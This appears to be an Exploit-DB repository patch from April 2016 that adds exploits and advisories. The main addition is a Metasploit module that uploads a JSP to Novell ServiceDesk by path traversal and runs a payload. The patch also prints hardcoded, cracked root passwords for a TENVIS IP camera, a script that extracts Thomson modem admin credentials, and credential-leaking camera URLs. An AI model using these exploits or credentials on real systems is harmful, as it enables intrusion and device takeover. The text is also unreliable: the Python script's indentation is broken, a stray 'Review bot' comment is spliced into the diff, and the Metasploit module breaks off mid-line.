From 29fc5c4082c97681a1c708a4a268a9a33dac6e6e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 19 Apr 2016 05:04:12 +0000 Subject: [PATCH] DB: 2016-04-19 5 new exploits Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64) WordPress leenk.me Plugin 2.5.0 - CSRF/XSS WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials Novell ServiceDesk Authenticated File Upload pfSense Community Edition 2.2.6 - Multiple Vulnerabilities
---
 files.csv | 7 +- platforms/hardware/dos/39706.txt | 39 +++ platforms/hardware/webapps/38067.py | 116 ++++---- platforms/hardware/webapps/38245.txt | 223 ++++++++-------- platforms/linux/local/33322.c | 2 + platforms/linux/local/33523.c | 2 + platforms/multiple/remote/39708.rb | 384 +++++++++++++++++++++++++++ platforms/php/webapps/39704.txt | 117 ++++++++ platforms/php/webapps/39705.txt | 133 ++++++++++ platforms/php/webapps/39709.txt | 145 ++++++++++ 10 files changed, 991 insertions(+), 177 deletions(-) create mode 100755 platforms/hardware/dos/39706.txt create mode 100755 platforms/multiple/remote/39708.rb create mode 100755 platforms/php/webapps/39704.txt create mode 100755 platforms/php/webapps/39705.txt create mode 100755 platforms/php/webapps/39709.txt
diff --git a/files.csv b/files.csv
index b8eacd954..a86d46302 100755
--- a/files.csv
+++ b/files.csv
@@ -8567,7 +8567,7 @@ id,file,description,date,author,platform,type,port
 9080,platforms/php/webapps/9080.txt,"Opial 1.0 (albumid) Remote SQL Injection Vulnerability",2009-07-02,"ThE g0bL!N",php,webapps,0
 9081,platforms/php/webapps/9081.txt,"Rentventory Multiple Remote SQL Injection Vulnerabilities",2009-07-02,Moudi,php,webapps,0
 9082,platforms/freebsd/local/9082.c,"FreeBSD 7.0/7.1 vfs.usermount - Local Privilege Escalation Exploit",2009-07-09,"Patroklos Argyroudis",freebsd,local,0
-9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit",2009-07-09,sgrakkyu,linux,local,0
+9083,platforms/linux/local/9083.c,"Linux Kernel <= 2.6.28.3 - set_selection() UTF-8 Off By One Local Exploit (x86-64)",2009-07-09,sgrakkyu,linux,local,0
 9084,platforms/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution PoC",2009-07-09,"laurent gaffié ",windows,dos,0
 9085,platforms/multiple/dos/9085.txt,"MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)",2009-07-09,kingcope,multiple,dos,0
 9086,platforms/php/webapps/9086.txt,"MRCGIGUY Thumbnail Gallery Post 1b Arb. Shell Upload Vulnerability",2009-07-09,"ThE g0bL!N",php,webapps,0
@@ -35921,3 +35921,8 @@ id,file,description,date,author,platform,type,port
 39700,platforms/lin_x86-64/shellcode/39700.c,"Linux/x86_64 - Read /etc/passwd - 65 bytes",2016-04-15,"Ajith Kp",lin_x86-64,shellcode,0
 39701,platforms/cgi/webapps/39701.txt,"AirOS 6.x - Arbitrary File Upload",2016-04-15,93c08539,cgi,webapps,443
 39702,platforms/linux/local/39702.rb,"Exim _perl_startup_ Privilege Escalation",2016-04-15,metasploit,linux,local,0
+39704,platforms/php/webapps/39704.txt,"WordPress leenk.me Plugin 2.5.0 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
+39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - CSRF/XSS",2016-04-18,cor3sm4sh3r,php,webapps,80
+39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0
+39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk Authenticated File Upload",2016-04-18,metasploit,multiple,remote,80
+39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443
diff --git a/platforms/hardware/dos/39706.txt b/platforms/hardware/dos/39706.txt
new file mode 100755
index 000000000..fc3a9e893
--- /dev/null
+++ b/platforms/hardware/dos/39706.txt
@@ -0,0 +1,39 @@ +Exploit Title: TH692- Outdoor P2P HD Waterproof IP Camera hardcoded credentials +Date: 4/16/2016 +Exploit Author: DLY +Vendor: TENVIS Technology Co., Ltd +Product: TH692- Outdoor P2P HD Waterproof IP Camera +Product webpage: http://www.tenvis.com/th-692-outdoor-p2p-hd-waterproof-ip-camera-p-230.html +Affected version: TH692C-V. 16.1.16.1.1.4 +firmware download link: http://download.tenvis.com/files/updatefiles/UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov + +user: Mroot +pass:cat1029 +user:Wproot +pass: cat1029 + +root@kali:~# strings UPG_ipc3360a-w7-M20-hi3518-20160229_173554.ov.1 | grep root +rootpath +rootfs crc %lx +------------------start upgrade rootfs------------------ +------------------end upgrade rootfs------------------ +bootargs=mem=74M console=ttyAMA0,115200 root=/dev/mtdblock2 rootfstype=jffs2 mtdparts=hi_sfc:256K(boot),2560K(kernel),11520K(rootfs),1M(config),64K(key),960K(ext) +nfsroot +7root +Bmount -t nfs -o nolock 192.168.0.99:/home/bt/vvvipc_develop/rootfs_target /nfsroot +k01000100 rootbox nohelp info +root::0: +Mroot:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh +Wproot:$1$d3VPdE0x$Ztn09cyReJy5PynZgwCbw0:0:0::/root:/bin/sh +nfsroot +pivot_root +xswitch_root +chroot +nfsroot +root@kali:~# john --show ipcamhashes +Mroot:cat1029:0:0::/root:/bin/sh +Wproot:cat1029:0:0::/root:/bin/sh + +2 password hashes cracked, 0 left + + diff --git a/platforms/hardware/webapps/38067.py b/platforms/hardware/webapps/38067.py index 707b8dc06..999b1482e 100755 --- a/platforms/hardware/webapps/38067.py +++ b/platforms/hardware/webapps/38067.py @@ -3,7 +3,7 @@ #+- #+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access #+- Date: October 22, 2013 -#+- Author: Glaysson dos Santos +#+- Author: 0rwelllabs #+- #+- Product: TWG850-4B Wireless VoIP Cable Modem #+- Software Version: ST9C.05.08 
@@ -11,13 +11,14 @@ #+- BOOT Revision: 2.1.7i #+- Standard Specification Compliant: DOCSIS 2.0 #+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin -#+- Firmware Build Time 19:19:19 Thu Feb 17 2011 +#+- Firmware Build Time 19:19:19 Thu Feb 17 2011 #+- Severity: High #+- #+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ################################################################################ + import string import urllib2 import sys 
@@ -36,77 +37,74 @@ D_C = ("\033[0m" ) def banner(): - os.system('clear') - print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \ - \t- 2013 - Glaysson dos Santos (0cn1)\n\n" +os.system('clear') +print "\nThomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read\n \ + \t- 2013 - O_Orwelllabs\n\n" def hr_data(filename, min=4): - with open(filename, "rb") as f: - result = "" - for c in f.read(): - if c in string.printable: - result += c - continue - if len(result) >= min: - yield result - print >> log, result - result = "" - print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save) +with open(filename, "rb") as f: + result = "" + for c in f.read(): + if c in string.printable: + result += c + continue + if len(result) >= min: + yield result +print >> log, result + result = "" +print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D\n"%(save) def checkcreds(router,username,password): - auth_handler = urllib2.HTTPBasicAuthHandler() - auth_handler.add_password(realm='Thomson', - uri = router, - user = username, +auth_handler = urllib2.HTTPBasicAuthHandler() +auth_handler.add_password(realm='Thomson', + uri = router, + user = username, passwd= password) - opener = urllib2.build_opener(auth_handler) - try: - urllib2.install_opener(opener) - status = urllib2.urlopen('%s/%s'%(router,refi)) - print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C) +opener = urllib2.build_opener(auth_handler) +try: + urllib2.install_opener(opener) + status = urllib2.urlopen('%s/%s'%(router,refi)) + print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C) - except urllib2.URLError, e: - if e.code == 401: - print '(+)- [status:%s%s%s] Invalid Credentials! 
Try yourself in a browser.'%(R_C,e.code,D_C) +except urllib2.URLError, e: + if e.code == 401: + print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C) def checkvuln(router): - try: - print '(+)- Checking if target is vulnerable...' - req = urllib2.Request('%s/%s'%(router,bifi)) - response = urllib2.urlopen(req) - page = response.read() - x = open(bifi,'wb') - x.write(page) - x.close() - sleep(1) - print '(+)- The target appears to be vulnerable, lets check it better!' - print '(+)- Searching Credentials...' - sleep(1) - for s in hr_data(bifi): - try: - dec = base64.decodestring(s) - if dec.find(':') != -1: - user,passwd = dec.split(':') - print '(+)- User: %s%s%s'%(G_C,user,D_C) - print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C) - - print '(+)- Checking if creds are OK...' - checkcreds(router,user,passwd) - - except(binascii.Error): - pass - except urllib2.URLError, e: - print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C) - sys.exit(1) +try: +print '(+)- Checking if target is vulnerable...' +req = urllib2.Request('%s/%s'%(router,bifi)) +response = urllib2.urlopen(req) +page = response.read() +x = open(bifi,'wb') +x.write(page) +x.close() +sleep(1) +print '(+)- The target appears to be vulnerable, lets check it better!' +print '(+)- Searching Credentials...' +sleep(1) +for s in hr_data(bifi): +try: +dec = base64.decodestring(s) +if dec.find(':') != -1: +user,passwd = dec.split(':') +print '(+)- User: %s%s%s'%(G_C,user,D_C) +print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C) +print '(+)- Checking if creds are OK...' +checkcreds(router,user,passwd) +except(binascii.Error): +pass +except urllib2.URLError, e: +print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C) +sys.exit(1) if __name__ == "__main__": - banner() +banner() if len(sys.argv) != 2: print '[!] 
%sRun %s router IP%s\n'%(R_C,sys.argv[0],D_C) sys.exit(2) - router = sys.argv[1] if not "http" in router: router = "http://"+(sys.argv[1]) - checkvuln(router) \ No newline at end of file + checkvuln(router) diff --git a/platforms/hardware/webapps/38245.txt b/platforms/hardware/webapps/38245.txt index 17910e9b2..b90be2da8 100755 --- a/platforms/hardware/webapps/38245.txt +++ b/platforms/hardware/webapps/38245.txt 
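Review bot: The new side of this hunk drops the body indentation under `def banner():`, `def hr_data(...)`, `def checkcreds(...)`, `def checkvuln(...)` and the final `if __name__ == "__main__":` block — `+os.system('clear')`, `+with open(filename, "rb") as f:`, `+auth_handler = urllib2.HTTPBasicAuthHandler()`, `+try:` and `+banner()` now start at column 0 right after their headers, so the file no longer parses (IndentationError on the first body line). This reads as whitespace mangling rather than an intended rewrite; the four-space indentation visible on the removed lines should be restored, with `print >> log, result` back inside the `if len(result) >= min:` branch where the old side had it. While re-indenting, the `x = open(bifi,'wb')` / `x.write(page)` / `x.close()` sequence in `checkvuln` would be safer as `with open(bifi, 'wb') as x: x.write(page)`, so the handle is released even if the write raises.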
@@ -1,148 +1,137 @@ -1. *Advisory Information* +1. Adivisory Information Title: ADH-Web Server IP-Cameras Improper Access Restrictions +EDB-ID: 38245 +Advisory ID: OLSA-2015-0919 +Advisory URL: http://www.orwelllabs.com/2015/10/adh-web-server-ip-cameras-improper.html Date published: 2015-09-19 -Date of last update: 2015-09-19 -Vendors contacted: ADH-Web -Author: Glaysson dos Santos -Release mode: User release +Date of last update: 2016-02-15 +Vendors contacted: Dedicated Micros -2. *Vulnerability Information* + +2. Vulnerability Information Class: Information Exposure [CWE-200] -Impact: Security bypass +Impact: Access Control Bypass Remotely Exploitable: Yes Locally Exploitable: No -CVE Name: +CVE Name: N/A -3. *Vulnerabilities* -3.1 ADH-Web Server IP-Cameras Improper Access Restrictions +3. Vulnerability Description -3.1.1 Description +Due to improper access restriction the ADH-Web device [1] allows a remote attacker to browse and access arbitrary files from the following directorie '/hdd0/logs'. You can also get numerous information (important for a fingerprint step) via the parameter variable in variable.cgi script [2]. -Due to improper access restriction the ADH-Web (item 4) device [1] allows a -remote attacker to browse and access arbitrary files from the following -directorie '/hdd0/logs'. you can also get numerous information -(important for a fingerprint step) via the parameter "variable" in -variable.cgi script. +Background: -3.1.2 Vulnerability Details +Dedicated Micros’ ground breaking Closed IPTV solution makes deploying an IP Video, CCTV system safe, secure and simple. Combining patent-pending innovation with zeroconf networking technology, Closed IPTV automatically allocates IP addresses to IP cameras by physical port. In this way the system is completely deterministic, creating firewalls and monitoring IP connections by individual network ports so they cannot be hacked or intercepted. 
This ground breaking solution provides a very simple and secure answer to IP Video, meaning that no prior knowledge of IP networking is required. Sophisticated and Dependable network security can be achieved with a single click. -Usually this directory can be protected against -unauthenticated access (401 Unauthorized), though, it can access all files -directly without requiring authentication.As in the statement below: -[401] -. 'http:///hdd0/logs' - [200] -. 'http:///hdd0/logs/log.txt' +4. Vulnerable Packages - Most common logfiles: - -. 'bak.txt -. 'connect.txt' -. 'log.txt' -. 'seclog.log' -. 'startup.txt' -. 'DBGLOG.TXT' -. 'access.txt' -. 'security.txt' - -3.1.3 Impact - -This could allow a remote attacker to obtain valuable information such as -access credentials, Network configuration and other sensitive information -in plain text. - -Another problem identified is an information exposure via the parameter -"variable" in variable.cgi script. Knowing some variables can extract a -reasonable amount of information. For exemplo: - -* DNS -. 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0' - -* ftp master ftp console credenthials ((the development team said that this -credential is not used, then why does it exist?): -. ' -http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 -' -. ' -http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 -' - -(although the vast majority of servers have ftp / telnet with anonymous -access allowed.) - -* alarms -. 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0' -* camconfig -. 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1' -(includes, but is not limited to) There are a lot of variables [an audit -tool is on the way]. - -This servers also sends credentials (and other sensitive data) via GET -parameters -This is poor practice as the URL is liable to be logged in any number of -places -between the customer and the camera. 
The credentials should be passed in -the body -of a POST request (under SSL of course, here is not the case). . -(Is possible to create, edit and delete users and other configurations in -this way, dangerous) - -4. *Vulnerable Products and Packages* - - . The following products are affected: - SD Advanced Closed IPTV - SD Advanced - EcoSense - Digital Sprite 2 -Other products/models are probably affected too, but they I not checked. -5. *Vendor Information, Solutions and Workarounds* -The vendor found that some things are not vulnerabilities (sensitive -information via GET, for example) -and others are useless (hardcoded credentials) and others are not yet so -critical (access to server logs). -I think that at least this information can assist during an intrusion test, -as will be shown soon. +5. Technical Description -6. *Credits* -This vulnerability was discovered by Glaysson dos Santos. +[1] Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below: -7. *Report Timeline* +(401): http:///hdd0/logs +(200): http:///hdd0/logs/log.txt -. 2015-08-31: -Vendor has been notified about the vulnerabilities (without details yet). +> Most common logfiles: -. 2015-09-01: -Vendor acknowledges the receipt of the email and asks for technical -details. + arc_log.txt + bak.txt + connect.txt + log.txt + seclog.log + startup.txt + DBGLOG.TXT + access.txt + security.txt -. 2013-09-01: -A email with technical details is sent to vendor. +[2] Another problem identified is an information exposure via the parameter variable in variable.cgi script. Knowing some variables can extract a reasonable amount of information: -. 2013-09-11: -Still no response, another email was sent to the Vendor requesting any -opinion on the reported problems. 
+> DNS: +http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0 -the following points were highlighted in this email: -* 1. No unauthenticated access [No web pages/URL parameters on the cameras -should be accessible without credentials.] -* 2. Credentials (and other sensitive data) via GET parameters -* 4. Use of hard-coded password -* 3. no SSL +> ftp master ftp console credentials: +http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 +http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 -. 2013-09-11: -The vendor reported that the matter was passed on to the team developed -and that it would contact me the following week (2015-09-14). +(although the vast majority of servers have ftp/telnet with anonymous access allowed.) -. 2013-09-14: -The development team responded by passing its consideration of the points -and -reported in accordance with this response the impact of these -vulnerabilities -is low and are no longer available unauthenticated using recent software -release (version 10212). +> alms +http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0 + +> camconfig +http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1 +(includes, but is not limited to) + +This servers also sends credentials (and other sensitive data) via GET parameters, this is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, very dangerous CSRF vectors). + + +6. Vendor Information, Solutions and Workarounds + +The vendor found that some things are not vulnerabilities (sensitive information via GET, for example) and others are useless (hardcoded credentials) and others are not yet so critical (access to server logs). 
I think that at least this information can assist during an intrusion test, as will be shown soon. + + +7. Credits +These vulnerabilities has been discovered by Orwelllabs. + + +8. Report Timeline + +2015-08-31: Vendor has been notified about the vulnerabilities (without details yet). +2015-09-01: Vendor acknowledges the receipt of the email and asks for technical details. +2015-09-01: A email with technical details is sent to vendor. +2015-09-11: Still no response, another email was sent to the Vendor requesting any opinion on the reported problems. +2015-09-11: The vendor reported that the matter was passed on to the team developed and that it would contact me the following week (2015-09-14). + +2015-09-14: The development team responded by passing its consideration of the points andreported in accordance with this response the impact of these vulnerabilities is low and are no longer available unauthenticated using recent software release (version 10212). + + +Legal Notices ++++++++++++++ +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +I accept no responsibility for any damage caused by the use or misuse of this information. + + +About Orwelllabs +++++++++++++++++ +Orwelllabs is a security research lab interested in embedded device & webapp hacking. +We aims to create some intelligence around this vast and confusing picture that is the Internet of things. 
+ + +-----BEGIN PGP PUBLIC KEY BLOCK----- +mQENBFcJl8wBCAC/J8rAQdOoC82gik6LVbH674HnxAAQ6rBdELkyR2S2g1zMIAFt +xNN//A3bUWwFtlrfgiJkiOC86FimPus5O/c4iZc8klm07hxWuzoLPzBPM50+uGKH +xZwwLa5PLuuR1T0O+OFqd9sdltz6djaYrFsdq6DZHVrp31P7LqHHRVwN8vzqWmSf +55hDGNTrjbnmfuAgQDrjA6FA2i6AWSTXEuDd5NjCN8jCorCczDeLXTY5HuJDb2GY +U9H5kjbgX/n3/UvQpUOEQ5JgW1QoqidP8ZwsMcK5pCtr9Ocm+MWEN2tuRcQq3y5I +SRuBk/FPhVVnx5ZrLveClCgefYdqqHi9owUTABEBAAG0IU9yd2VsbExhYnMgPG9y +d2VsbGxhYnNAZ21haWwuY29tPokBOQQTAQgAIwUCVwmXzAIbAwcLCQgHAwIBBhUI +AgkKCwQWAgMBAh4BAheAAAoJELs081R5pszAhGoIALxa6tCCUoQeksHfR5ixEHhA +Zrx+i3ZopI2ZqQyxKwbnqXP87lagjSaZUk4/NkB/rWMe5ed4bHLROf0PAOYAQstE +f5Nx2tjK7uKOw+SrnnFP08MGBQqJDu8rFmfjBsX2nIo2BgowfFC5XfDl+41cMy9n +pVVK9qHDp9aBSd3gMc90nalSQTI/QwZ6ywvg+5/mG2iidSsePlfg5d+BzQoc6SpW +LUTJY0RBS0Gsg88XihT58wnX3KhucxVx9RnhainuhH23tPdfPkuEDQqEM/hTVlmN +95rV1waD4+86IWG3Zvx79kbBnctD/e9KGvaeB47mvNPJ3L3r1/tT3AQE+Vv1q965 +AQ0EVwmXzAEIAKgsUvquy3q8gZ6/t6J+VR7ed8QxZ7z7LauHvqajpipFV83PnVWf +ulaAIazUyy1XWn80bVnQ227fOJj5VqscfnHqBvXnYNjGLCNMRix5kjD/gJ/0pm0U +gqcrowSUFSJNTGk5b7Axdpz4ZyZFzXc33R4Wvkg/SAvLleU40S2wayCX+QpwxlMm +tnBExzgetRyNN5XENATfr87CSuAaS/CGfpV5reSoX1uOkALaQjjM2ADkuUWDp6KK +6L90h8vFLUCs+++ITWU9TA1FZxqTl6n/OnyC0ufUmvI4hIuQV3nxwFnBj1Q/sxHc +TbVSFcGqz2U8W9ka3sFuTQrkPIycfoOAbg0AEQEAAYkBHwQYAQgACQUCVwmXzAIb +DAAKCRC7NPNUeabMwLE8B/91F99flUVEpHdvy632H6lt2WTrtPl4ELUy04jsKC30 +MDnsfEjXDYMk1GCqmXwJnztwEnTP17YO8N7/EY4xTgpQxUwjlpah++51JfXO58Sf +Os5lBcar8e82m1u7NaCN2EKGNEaNC1EbgUw78ylHU3B0Bb/frKQCEd60/Bkv0h4q +FoPujMQr0anKWJCz5NILOShdeOWXIjBWxikhXFOUgsUBYgJjCh2b9SqwQ2UXjFsU +I0gn7SsgP0uDV7spWv/ef90JYPpAQ4/tEK6ew8yYTJ/omudsGLt4vl565ArKcGwB +C0O2PBppCrHnjzck1xxVdHZFyIgWiiAmRyV83CiOfg37 +=IZYl +-----END PGP PUBLIC KEY BLOCK----- diff --git a/platforms/linux/local/33322.c b/platforms/linux/local/33322.c index ca820e212..08e44eba1 100755 --- a/platforms/linux/local/33322.c +++ b/platforms/linux/local/33322.c 
@@ -1,8 +1,10 @@ +/* source: http://www.securityfocus.com/bid/36901/info Linux kernel is prone to a local privilege-escalation vulnerability that is caused by a NULL-pointer dereference. Local attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. +*/ /****************************************************************************** * .:: Impel Down ::. diff --git a/platforms/linux/local/33523.c b/platforms/linux/local/33523.c index d892c1cbb..4cbdd68ea 100755 --- a/platforms/linux/local/33523.c +++ b/platforms/linux/local/33523.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/37806/info Linux kernel is prone to a local privilege-escalation vulnerability. @@ -7,6 +8,7 @@ Local attackers can exploit this issue to execute arbitrary code with kernel-lev Successful exploits will result in the complete compromise of affected computers. The Linux Kernel 2.6.28 and later are vulnerable. +*/ #ifndef _GNU_SOURCE # define _GNU_SOURCE diff --git a/platforms/multiple/remote/39708.rb b/platforms/multiple/remote/39708.rb new file mode 100755 index 000000000..01b1d741d --- /dev/null +++ b/platforms/multiple/remote/39708.rb 
@@ -0,0 +1,384 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Novell ServiceDesk Authenticated File Upload', + 'Description' => %q{ + This module exploits an authenticated arbitrary file upload via directory traversal + to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in + Windows and Linux installations of Novell ServiceDesk, as well as the Virtual + Appliance provided by Novell. + }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2016-1593' ], + [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt' ], + [ 'URL', 'http://seclists.org/bugtraq/2016/Apr/64' ] + ], + 'Platform' => %w{ linux win }, + 'Arch' => ARCH_X86, + 'DefaultOptions' => { 'WfsDelay' => 15 }, + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'Novell ServiceDesk / Linux', + { + 'Platform' => 'linux', + 'Arch' => ARCH_X86 + } + ], + [ 'Novell ServiceDesk / Windows', + { + 'Platform' => 'win', + 'Arch' => ARCH_X86 + } + ], + ], + 'Privileged' => false, # Privileged on Windows but not on (most) Linux targets + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Mar 30 2016' + )) + + register_options( + [ + OptPort.new('RPORT', + [true, 'The target port', 80]), + OptString.new('USERNAME', + [true, 'The username to login as', 'admin']), + OptString.new('PASSWORD', + [true, 'Password for the specified username', 'admin']), + OptString.new('TRAVERSAL_PATH', + [false, 'Traversal path to tomcat/webapps/LiveTime/']) + ], self.class) + end + + + def get_version + res = 
send_request_cgi({ + 'uri' => normalize_uri('LiveTime','WebObjects','LiveTime.woa'), + 'method' => 'GET', + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + } + }) + + if res && res.code == 200 && res.body.to_s =~ /\

\Version \#([0-9\.]+)\<\/p\>/ + return $1.to_f + else + return 999 + end + end + + + def check + version = get_version + if version <= 7.1 && version >= 6.5 + return Exploit::CheckCode::Appears + elsif version > 7.1 + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Unknown + end + end + + + def pick_target + return target if target.name != 'Automatic' + + print_status("#{peer} - Determining target") + + os_finder_payload = %Q{<%out.println(System.getProperty("os.name"));%>} + + traversal_paths = [] + if datastore['TRAVERSAL_PATH'] + traversal_paths << datastore['TRAVERSAL_PATH'] # add user specified or default Virtual Appliance path + end + + # add Virtual Appliance path plus the traversal in a Windows or Linux self install + traversal_paths.concat(['../../srv/tomcat6/webapps/LiveTime/','../../Server/webapps/LiveTime/']) + + # test each path to determine OS (and correct path) + traversal_paths.each do |traversal_path| + jsp_name = upload_jsp(traversal_path, os_finder_payload) + + res = send_request_cgi({ + 'uri' => normalize_uri('LiveTime', jsp_name), + 'method' => 'GET', + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies + }) + + if res && res.code == 200 + if res.body.to_s =~ /Windows/ + @my_target = targets[2] + else + # Linux here + @my_target = targets[1] + end + if traversal_path.include? 
'/srv/tomcat6/webapps/' + register_files_for_cleanup('/srv/tomcat6/webapps/LiveTime/' + jsp_name) + else + register_files_for_cleanup('../webapps/LiveTime/' + jsp_name) + end + return traversal_path + end + end + + return nil + end + + + def upload_jsp(traversal_path, jsp) + jsp_name = Rex::Text.rand_text_alpha(6+rand(8)) + ".jsp" + + post_data = Rex::MIME::Message.new + post_data.add_part(jsp, "application/octet-stream", 'binary', "form-data; name=\"#{@upload_form}\"; filename=\"#{traversal_path}#{jsp_name}\"") + data = post_data.to_s + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(@upload_url), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)', + }, + 'cookie' => @cookies, + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if not res && res.code == 200 + fail_with(Failure::Unknown, "#{peer} - Failed to upload payload...") + else + return jsp_name + end + end + + + def create_jsp + opts = {:arch => @my_target.arch, :platform => @my_target.platform} + payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch) + exe = generate_payload_exe(opts) + base64_exe = Rex::Text.encode_base64(exe) + + native_payload_name = rand_text_alpha(rand(6)+3) + ext = (@my_target['Platform'] == 'win') ? 
'.exe' : '.bin' + + var_raw = Rex::Text.rand_text_alpha(rand(8) + 3) + var_ostream = Rex::Text.rand_text_alpha(rand(8) + 3) + var_buf = Rex::Text.rand_text_alpha(rand(8) + 3) + var_decoder = Rex::Text.rand_text_alpha(rand(8) + 3) + var_tmp = Rex::Text.rand_text_alpha(rand(8) + 3) + var_path = Rex::Text.rand_text_alpha(rand(8) + 3) + var_proc2 = Rex::Text.rand_text_alpha(rand(8) + 3) + + if @my_target['Platform'] == 'linux' + var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3) + chmod = %Q| + Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path}); + Thread.sleep(200); + | + + var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3) + cleanup = %Q| + Thread.sleep(200); + Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path}); + | + else + chmod = '' + cleanup = '' + end + + jsp = %Q| + <%@page import="java.io.*"%> + <%@page import="sun.misc.BASE64Decoder"%> + <% + try { + String #{var_buf} = "#{base64_exe}"; + BASE64Decoder #{var_decoder} = new BASE64Decoder(); + byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); + + File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}"); + String #{var_path} = #{var_tmp}.getAbsolutePath(); + + BufferedOutputStream #{var_ostream} = + new BufferedOutputStream(new FileOutputStream(#{var_path})); + #{var_ostream}.write(#{var_raw}); + #{var_ostream}.close(); + #{chmod} + Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); + #{cleanup} + } catch (Exception e) { + } + %> + | + + jsp = jsp.gsub(/\n/, '') + jsp = jsp.gsub(/\t/, '') + jsp = jsp.gsub(/\x0d\x0a/, "") + jsp = jsp.gsub(/\x0a/, "") + + return jsp + end + + + def exploit + version = get_version + + # 1: get the cookies, the login_url and the password_form and username form names (they varies between versions) + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri('/LiveTime/WebObjects/LiveTime.woa'), + 'headers' => { + 'User-Agent' => 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 
